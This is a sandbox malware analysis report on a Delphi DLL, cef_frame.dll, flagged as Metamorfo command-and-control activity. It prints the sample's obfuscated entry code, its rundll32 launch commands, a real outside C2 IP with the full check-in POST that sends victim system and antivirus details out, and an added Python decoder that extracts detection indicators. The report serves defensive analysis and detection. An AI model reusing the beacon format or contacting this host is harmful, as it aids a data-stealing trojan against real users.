                              • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                              File name:cef_frame.dll
                              File size:22'631'424 bytes
                              MD5:a03c075ec2d02a406712ecbc828ca98e
                              SHA1:8f2b6a37800de2bc944e3d687bfd73754e550681
                              SHA256:32530abfeaeaefebdf0715fd098104671d716bb02d609197bef67c7f4b8b0e8d
                              SHA512:b1ffd8c6e78266afe95f310dd3ec3f7e3fc0542559ab572509a1817174195929c9d5579600f03738a83e3a17dc898691ad4ae91d96e3a8c90f8ef0807df0002d
                              SSDEEP:393216:Ax/MizKyPRc0TCzzO2fqnyVn9SrNoVfImFIBGI722jhasu1/lwM1ViakY:Ax/MizKyPRZCuiVQMfpGBGorQwTaH
                              TLSH:3037339D3DDB01E1D9C209B2D7273BEB13F3229A45DA883579C136C6B0E2F76502E946
                              File Content Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........PE..L.....{g..................A...9......3........B...@...........................g......................................Z.....
                              Icon Hash:7ae282899bbab082
                              Entrypoint:0x359331c
                              Entrypoint Section:.z}'
                              Digitally signed:false
                              Imagebase:0x400000
                              Subsystem:windows gui
                              Image File Characteristics:EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, DLL, BYTES_REVERSED_HI
                              DLL Characteristics:
                              Time Stamp:0x677BFBEA [Mon Jan 6 15:51:06 2025 UTC]
                              TLS Callbacks:
                              CLR (.Net) Version:
                              OS Version Major:5
                              OS Version Minor:0
                              File Version Major:5
                              File Version Minor:0
                              Subsystem Version Major:5
                              Subsystem Version Minor:0
                              Import Hash:0a1abf9db61b744799e83fff23b7e0dd
                              Instruction
                              push esi
                              pushfd
                              mov esi, AE86A820h
                              add esi, FE30E9ADh
                              push ecx
                              not esi
                              mov ecx, 8CA5CF3Eh
                              or esi, B2A437B1h
                              mov esi, dword ptr [esp+ecx+735A30CAh]
                              mov dword ptr [esp+08h], 42126F76h
                              mov ecx, dword ptr [esp+ecx+735A30C2h]
                              call 00007FF4AF584403h
                              mov dword ptr [esi-04h], edx
                              movzx ecx, ax
                              xchg dword ptr [esp+ecx*4-000160D8h], ecx
                              movzx eax, byte ptr [ecx+edi-00A40202h]
                              lea edx, dword ptr [ecx+ecx*8-1AF24AC2h]
                              sal ecx, cl
                              btr ecx, FFFFFF9Ah
                              xor al, bl
                              or word ptr [esp+ecx*4-0A402020h], dx
                              adc dword ptr [esp+ecx-02900808h], ecx
                              sbb word ptr [esp+ecx*2-0520100Fh], dx
                              not al
                              shr dl, FFFFFF86h
                              shl ecx, cl
                              rol al, 1
                              lea ecx, dword ptr [B5AC8196h+edx*8]
                              bt edx, edx
                              sbb al, dl
                              or byte ptr [esp+ecx*4-30EAE675h], cl
                              xor al, dl
                              rol al, 1
                              bts dx, dx
                              dec dx
                              and dx, 1F24h
                              xor bl, al
                              add ecx, E0A5A424h
                              adc cl, FFFFFF89h
                              sbb cl, dl
                              mov cx, ax
                              mov eax, dword ptr [esp+00h]
                              jno 00007FF4B04259B2h
                              inc ecx
                              pop ebx
                              inc edx
                              lea ebx, dword ptr [ebx+esi*4-3C80ACA1h]
                              inc ecx
                              movzx ecx, cx
                              bswap ebx
                               Name | Virtual Address | Virtual Size | Is in Section
                               IMAGE_DIRECTORY_ENTRY_EXPORT | 0x30a5a88 | 0xb4 | .z}'
                               IMAGE_DIRECTORY_ENTRY_IMPORT | 0x3107b24 | 0x140 | .z}'
                               IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x367a000 | 0x258 | .rsrc
                               IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
                               IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
                               IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x367b000 | 0x7d8 | .reloc
                               IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
                               IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
                               IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
                               IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
                               IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
                               IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
                               IMAGE_DIRECTORY_ENTRY_IAT | 0x20e4000 | 0x7c | .< a
                               IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x3320c00 | 0x1c0 | .z}'
                               IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
                               IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
                               Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
                               .text | 0x1000 | 0x41cba8 | 0x0 | d41d8cd98f00b204e9800998ecf8427e | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                               .itext | 0x41e000 | 0x2c38 | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                               .data | 0x421000 | 0x11924 | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                               .bss | 0x433000 | 0x7a5c | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                               .idata | 0x43b000 | 0x3b1e | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                               .didata | 0x43f000 | 0xc68 | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                               .edata | 0x440000 | 0xb4 | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                               .rdata | 0x441000 | 0x45 | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                               .E{7 | 0x442000 | 0x1ca1b03 | 0x0 | d41d8cd98f00b204e9800998ecf8427e | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                               .< a | 0x20e4000 | 0x94 | 0x200 | 5164c24cf8c47990102f1092b446c7b2 | False | 0.171875 | data | 1.165861165884647 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                               .z}' | 0x20e5000 | 0x1594050 | 0x1594200 | d1fd3841a4b8fc8da1247598162d8ada | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                               .rsrc | 0x367a000 | 0x258 | 0x400 | bbac6bcd485a3e1597cf38c6b86ceb8c | False | 0.279296875 | data | 2.0648926286113696 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                               .reloc | 0x367b000 | 0x7d8 | 0x800 | f4979961f85044534355d077a8a111ea | False | 0.49365234375 | data | 4.448328956654729 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                               Name | RVA | Size | Type | Language | Country | ZLIB Complexity
                               RT_VERSION | 0x367a058 | 0x200 | Intel ia64 COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970 | English | United States | 0.47265625
                               DLL | Import
                               shlwapi.dll | SHCreateStreamOnFileW
                               winspool.drv | DocumentPropertiesW
                               comctl32.dll | ImageList_GetImageInfo
                               shell32.dll | SHGetFolderPathW
                               user32.dll | MoveWindow
                               version.dll | GetFileVersionInfoSizeW
                               oleaut32.dll | SafeArrayPutElement
                               advapi32.dll | RegSetValueExW
                               netapi32.dll | NetWkstaGetInfo
                               msvcrt.dll | memcpy
                               kernel32.dll | GetVersion, GetVersionExW
                               wsock32.dll | gethostbyaddr
                               ole32.dll | OleRegEnumVerbs
                               gdi32.dll | Pie
                               Magnification.dll | MagSetWindowSource
                               Name | Ordinal | Address
                               TMethodImplementationIntercept | 3 | 0x46dc0c
                               TbsAppInstance | 4 | 0x80f4d0
                               __dbk_fcall_wrapper | 2 | 0x412114
                               dbkFCallWrapperAddr | 1 | 0x836640
                               Language of compilation system | Country where language is spoken | Map
                               English | United States |
                               Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
                               2025-01-15T20:38:03.630224+0100 | 2833187 | ETPRO MALWARE Win32/Metamorfo CnC Checkin | 1 | 192.168.2.6 | 49852 | 15.228.77.178 | 80 | TCP
                               Timestamp | Source Port | Dest Port | Source IP | Dest IP
                               Jan 15, 2025 20:37:42.258096933 CET | 49852 | 80 | 192.168.2.6 | 15.228.77.178
                               Jan 15, 2025 20:37:42.263139963 CET | 80 | 49852 | 15.228.77.178 | 192.168.2.6
                               Jan 15, 2025 20:37:42.263225079 CET | 49852 | 80 | 192.168.2.6 | 15.228.77.178
                               Jan 15, 2025 20:37:42.263437033 CET | 49852 | 80 | 192.168.2.6 | 15.228.77.178
                               Jan 15, 2025 20:37:42.268265009 CET | 80 | 49852 | 15.228.77.178 | 192.168.2.6
                               Jan 15, 2025 20:37:42.268651009 CET | 49852 | 80 | 192.168.2.6 | 15.228.77.178
                               Jan 15, 2025 20:37:42.273521900 CET | 80 | 49852 | 15.228.77.178 | 192.168.2.6
                               Jan 15, 2025 20:37:43.858330965 CET | 58179 | 53 | 192.168.2.6 | 162.159.36.2
                               Jan 15, 2025 20:37:43.863193035 CET | 53 | 58179 | 162.159.36.2 | 192.168.2.6
                               Jan 15, 2025 20:37:43.863353968 CET | 58179 | 53 | 192.168.2.6 | 162.159.36.2
                               Jan 15, 2025 20:37:43.887554884 CET | 53 | 58179 | 162.159.36.2 | 192.168.2.6
                               Jan 15, 2025 20:37:44.408051014 CET | 58179 | 53 | 192.168.2.6 | 162.159.36.2
                               Jan 15, 2025 20:37:44.413137913 CET | 53 | 58179 | 162.159.36.2 | 192.168.2.6
                               Jan 15, 2025 20:37:44.413191080 CET | 58179 | 53 | 192.168.2.6 | 162.159.36.2
                               Jan 15, 2025 20:38:03.630119085 CET | 80 | 49852 | 15.228.77.178 | 192.168.2.6
                               Jan 15, 2025 20:38:03.630223989 CET | 49852 | 80 | 192.168.2.6 | 15.228.77.178
                               Jan 15, 2025 20:38:03.630362034 CET | 49852 | 80 | 192.168.2.6 | 15.228.77.178
                               Jan 15, 2025 20:38:03.635848999 CET | 80 | 49852 | 15.228.77.178 | 192.168.2.6
                               Timestamp | Source Port | Dest Port | Source IP | Dest IP
                               Jan 15, 2025 20:37:43.847042084 CET | 53 | 49852 | 162.159.36.2 | 192.168.2.6
                               Jan 15, 2025 20:37:44.420780897 CET | 49698 | 53 | 192.168.2.6 | 1.1.1.1
                               Jan 15, 2025 20:37:44.439356089 CET | 53 | 49698 | 1.1.1.1 | 192.168.2.6
                               Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
                               Jan 15, 2025 20:37:44.420780897 CET | 192.168.2.6 | 1.1.1.1 | 0xdc11 | Standard query (0) | 171.39.242.20.in-addr.arpa | PTR (Pointer record) | IN (0x0001) | false
                               Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
                               Jan 15, 2025 20:37:44.439356089 CET | 1.1.1.1 | 192.168.2.6 | 0xdc11 | Name error (3) | 171.39.242.20.in-addr.arpa | none | none | PTR (Pointer record) | IN (0x0001) | false
                              • 15.228.77.178
                               Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                               0 | 192.168.2.6 | 49852 | 15.228.77.178 | 80 | 1804 | C:\Windows\SysWOW64\rundll32.exe
                               Timestamp | Bytes transferred | Direction | Data
                               Jan 15, 2025 20:37:42.263437033 CET | 271 | OUT | POST /ytr/serv.php HTTP/1.0
                               Connection: keep-alive
                               Content-Type: application/x-www-form-urlencoded
                               Content-Length: 145
                               Host: 15.228.77.178
                               Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                               User-Agent: Mozilla/3.0 (compatible; Indy Library)
                               Jan 15, 2025 20:37:42.268651009 CET | 145 | OUT | Data Raw: 76 76 3d 31 30 26 76 77 3d 26 6d 6f 64 73 3d 26 75 6e 61 6d 65 3d 5a 57 35 6e 61 57 35 6c 5a 58 49 26 63 6e 61 6d 65 3d 4e 6a 4d 79 4f 54 49 79 26 6f 73 3d 54 57 6c 6a 63 6d 39 7a 62 32 5a 30 49 46 64 70 62 6d 52 76 64 33 4d 67 4d 54 41 67 55 48
                               Data Ascii: vv=10&vw=&mods=&uname=ZW5naW5lZXI&cname=NjMyOTIy&os=TWljcm9zb2Z0IFdpbmRvd3MgMTAgUHJvIDY0LWJpdA&is=YWFhYSwgYWFhYSwgYWFh&iav=V2luZG93cyBEZWZlbmRlcg
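The check-in body above (the request the Suricata rule "ETPRO MALWARE Win32/Metamorfo CnC Checkin" fires on) is a form-encoded POST whose values are base64 with the trailing "=" padding stripped, sent with "Mozilla/3.0 (compatible; Indy Library)", the default User-Agent of the Delphi Indy networking components, to a bare-IP Host. The Python below is an added analyst helper, not part of the Joe Sandbox report and not code from the sample: it splits the captured request, restores the padding, decodes each field to text, and reports the traffic traits a detection rule can key on. The request line, headers and 145-byte body are copied from the capture; the CRLF framing and the indicator names are assumptions.

```python
"""Decode the Metamorfo check-in POST captured in the report above.

Added analyst helper (not part of the Joe Sandbox report or the sample).
"""
import base64
import binascii

# Constructed from the HTTP session shown above: request line, headers and
# the 145-byte form body are copied from the capture; CRLF framing is assumed.
CAPTURED_REQUEST = (
    "POST /ytr/serv.php HTTP/1.0\r\n"
    "Connection: keep-alive\r\n"
    "Content-Type: application/x-www-form-urlencoded\r\n"
    "Content-Length: 145\r\n"
    "Host: 15.228.77.178\r\n"
    "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n"
    "User-Agent: Mozilla/3.0 (compatible; Indy Library)\r\n"
    "\r\n"
    "vv=10&vw=&mods=&uname=ZW5naW5lZXI&cname=NjMyOTIy"
    "&os=TWljcm9zb2Z0IFdpbmRvd3MgMTAgUHJvIDY0LWJpdA"
    "&is=YWFhYSwgYWFhYSwgYWFh&iav=V2luZG93cyBEZWZlbmRlcg"
)


def split_request(raw):
    """Return (request_line, headers_dict, body) for a raw HTTP/1.x request."""
    head, _, body = raw.partition("\r\n\r\n")
    lines = head.split("\r\n")
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return lines[0], headers, body


def b64_decode_unpadded(value):
    """Decode base64 whose '=' padding was stripped; None if not printable text."""
    padded = value + "=" * (-len(value) % 4)
    try:
        text = base64.b64decode(padded, validate=True).decode("utf-8")
    except (binascii.Error, UnicodeDecodeError):
        return None
    return text if text.isprintable() else None


def decode_checkin(body):
    """Split the form body on '&' and '=' without URL-decoding.

    Standard base64 uses '+' and '/', which urllib's parse_qsl would mangle
    ('+' becomes a space), so the split is done by hand. Fields that do not
    decode to printable text (e.g. vv=10) are kept verbatim.
    """
    decoded = {}
    for pair in body.split("&"):
        key, _, value = pair.partition("=")
        if not value:
            decoded[key] = ""
            continue
        text = b64_decode_unpadded(value)
        decoded[key] = text if text is not None else value
    return decoded


def checkin_indicators(request_line, headers, body):
    """Traits of this beacon a detection rule can key on, taken from the capture alone."""
    hits = []
    if "Indy Library" in headers.get("user-agent", ""):
        hits.append("indy-library-user-agent")  # default UA of Delphi Indy components
    octets = headers.get("host", "").split(".")
    if len(octets) == 4 and all(o.isdigit() and int(o) <= 255 for o in octets):
        hits.append("host-is-bare-ipv4")  # no domain: Host header is the C2 address
    if request_line.startswith("POST ") and request_line.endswith(" HTTP/1.0"):
        hits.append("http-1.0-post")
    declared = int(headers.get("content-length", "0") or 0)
    if declared != len(body.encode("utf-8")):
        hits.append("content-length-mismatch")  # truncated or tampered capture
    return hits


if __name__ == "__main__":
    req_line, hdrs, body = split_request(CAPTURED_REQUEST)
    for key, value in decode_checkin(body).items():
        print(f"{key:>6} = {value!r}")
    print("indicators:", checkin_indicators(req_line, hdrs, body))
```

Run against the capture, the decoder yields uname "engineer", cname "632922", os "Microsoft Windows 10 Pro 64-bit", is "aaaa, aaaa, aaa" and iav "Windows Defender", which is the victim profile the sandbox's "Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)" signature refers to; the declared Content-Length of 145 matches the body exactly.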


                              Target ID:0
                              Start time:14:37:00
                              Start date:15/01/2025
                              Path:C:\Windows\System32\loaddll32.exe
                              Wow64 process (32bit):true
                              Commandline:loaddll32.exe "C:\Users\user\Desktop\cef_frame.dll"
                              Imagebase:0xe00000
                              File size:126'464 bytes
                              MD5 hash:51E6071F9CBA48E79F10C84515AAE618
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:Borland Delphi
                              Reputation:high
                              Has exited:true

                              Target ID:1
                              Start time:14:37:00
                              Start date:15/01/2025
                              Path:C:\Windows\System32\conhost.exe
                              Wow64 process (32bit):false
                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Imagebase:0x7ff66e660000
                              File size:862'208 bytes
                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Reputation:high
                              Has exited:true

                              Target ID:2
                              Start time:14:37:00
                              Start date:15/01/2025
                              Path:C:\Windows\SysWOW64\cmd.exe
                              Wow64 process (32bit):true
                              Commandline:cmd.exe /C rundll32.exe "C:\Users\user\Desktop\cef_frame.dll",#1
                              Imagebase:0x1c0000
                              File size:236'544 bytes
                              MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Reputation:high
                              Has exited:true

                              Target ID:3
                              Start time:14:37:00
                              Start date:15/01/2025
                              Path:C:\Windows\SysWOW64\rundll32.exe
                              Wow64 process (32bit):true
                              Commandline:rundll32.exe C:\Users\user\Desktop\cef_frame.dll,TMethodImplementationIntercept
                              Imagebase:0xc50000
                              File size:61'440 bytes
                              MD5 hash:889B99C52A60DD49227C5E485A016679
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:Borland Delphi
                              Reputation:high
                              Has exited:true

                              Target ID:4
                              Start time:14:37:00
                              Start date:15/01/2025
                              Path:C:\Windows\SysWOW64\rundll32.exe
                              Wow64 process (32bit):true
                              Commandline:rundll32.exe "C:\Users\user\Desktop\cef_frame.dll",#1
                              Imagebase:0xc50000
                              File size:61'440 bytes
                              MD5 hash:889B99C52A60DD49227C5E485A016679
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:Borland Delphi
                              Reputation:high
                              Has exited:true

                              Target ID:6
                              Start time:14:37:03
                              Start date:15/01/2025
                              Path:C:\Windows\SysWOW64\rundll32.exe
                              Wow64 process (32bit):true
                              Commandline:rundll32.exe C:\Users\user\Desktop\cef_frame.dll,TbsAppInstance
                              Imagebase:0xc50000
                              File size:61'440 bytes
                              MD5 hash:889B99C52A60DD49227C5E485A016679
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:Borland Delphi
                              Reputation:high
                              Has exited:false

                              Target ID:7
                              Start time:14:37:06
                              Start date:15/01/2025
                              Path:C:\Windows\SysWOW64\rundll32.exe
                              Wow64 process (32bit):true
                              Commandline:rundll32.exe C:\Users\user\Desktop\cef_frame.dll,__dbk_fcall_wrapper
                              Imagebase:0xc50000
                              File size:61'440 bytes
                              MD5 hash:889B99C52A60DD49227C5E485A016679
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:Borland Delphi
                              Reputation:high
                              Has exited:true

                              Target ID:11
                              Start time:14:37:23
                              Start date:15/01/2025
                              Path:C:\Windows\SysWOW64\WerFault.exe
                              Wow64 process (32bit):true
                              Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 504 -s 768
                              Imagebase:0x1000000
                              File size:483'680 bytes
                              MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Reputation:high
                              Has exited:true

                              Target ID:15
                              Start time:14:37:43
                              Start date:15/01/2025
                              Path:C:\Windows\SysWOW64\WerFault.exe
                              Wow64 process (32bit):true
                              Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 1912 -s 776
                              Imagebase:0x1000000
                              File size:483'680 bytes
                              MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Reputation:high
                              Has exited:true

                              Target ID:16
                              Start time:14:37:49
                              Start date:15/01/2025
                              Path:C:\Windows\SysWOW64\rundll32.exe
                              Wow64 process (32bit):true
                              Commandline:rundll32.exe "C:\Users\user\Desktop\cef_frame.dll",TMethodImplementationIntercept
                              Imagebase:0xc50000
                              File size:61'440 bytes
                              MD5 hash:889B99C52A60DD49227C5E485A016679
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:Borland Delphi
                              Reputation:high
                              Has exited:true

                              Target ID:17
                              Start time:14:37:49
                              Start date:15/01/2025
                              Path:C:\Windows\SysWOW64\rundll32.exe
                              Wow64 process (32bit):true
                              Commandline:rundll32.exe "C:\Users\user\Desktop\cef_frame.dll",TbsAppInstance
                              Imagebase:0xc50000
                              File size:61'440 bytes
                              MD5 hash:889B99C52A60DD49227C5E485A016679
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:Borland Delphi
                              Has exited:true

                              Target ID:18
                              Start time:14:37:49
                              Start date:15/01/2025
                              Path:C:\Windows\SysWOW64\rundll32.exe
                              Wow64 process (32bit):true
                              Commandline:rundll32.exe "C:\Users\user\Desktop\cef_frame.dll",__dbk_fcall_wrapper
                              Imagebase:0xc50000
                              File size:61'440 bytes
                              MD5 hash:889B99C52A60DD49227C5E485A016679
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:Borland Delphi
                              Has exited:true

                              Target ID:19
                              Start time:14:37:49
                              Start date:15/01/2025
                              Path:C:\Windows\SysWOW64\rundll32.exe
                              Wow64 process (32bit):true
                              Commandline:rundll32.exe "C:\Users\user\Desktop\cef_frame.dll",dbkFCallWrapperAddr
                              Imagebase:0xc50000
                              File size:61'440 bytes
                              MD5 hash:889B99C52A60DD49227C5E485A016679
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:Borland Delphi
                              Has exited:true

                              Target ID:21
                              Start time:14:38:07
                              Start date:15/01/2025
                              Path:C:\Windows\SysWOW64\WerFault.exe
                              Wow64 process (32bit):true
                              Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 7064 -s 768
                              Imagebase:0x1000000
                              File size:483'680 bytes
                              MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              Target ID:23
                              Start time:14:38:12
                              Start date:15/01/2025
                              Path:C:\Windows\SysWOW64\WerFault.exe
                              Wow64 process (32bit):true
                              Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 5192 -s 1272
                              Imagebase:0x1000000
                              File size:483'680 bytes
                              MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              Target ID:24
                              Start time:14:38:13
                              Start date:15/01/2025
                              Path:C:\Windows\SysWOW64\rundll32.exe
                              Wow64 process (32bit):true
                              Commandline:"C:\Windows\SysWOW64\rundll32.exe"
                              Imagebase:0xc50000
                              File size:61'440 bytes
                              MD5 hash:889B99C52A60DD49227C5E485A016679
                              Has elevated privileges:false
                              Has administrator privileges:false
                              Programmed in:C, C++ or other language
                              Has exited:true

                              Target ID:26
                              Start time:14:38:15
                              Start date:15/01/2025
                              Path:C:\Windows\SysWOW64\WerFault.exe
                              Wow64 process (32bit):true
                              Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 5192 -s 1436
                              Imagebase:0x1000000
                              File size:483'680 bytes
                              MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              Target ID:27
                              Start time:14:38:21
                              Start date:15/01/2025
                              Path:C:\Windows\SysWOW64\rundll32.exe
                              Wow64 process (32bit):true
                              Commandline:"C:\Windows\SysWOW64\rundll32.exe"
                              Imagebase:0xc50000
                              File size:61'440 bytes
                              MD5 hash:889B99C52A60DD49227C5E485A016679
                              Has elevated privileges:false
                              Has administrator privileges:false
                              Programmed in:C, C++ or other language
                              Has exited:true

                              Target ID:29
                              Start time:14:38:23
                              Start date:15/01/2025
                              Path:C:\Windows\SysWOW64\WerFault.exe
                              Wow64 process (32bit):true
                              Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 4232 -s 768
                              Imagebase:0x7ff726190000
                              File size:483'680 bytes
                              MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              No disassembly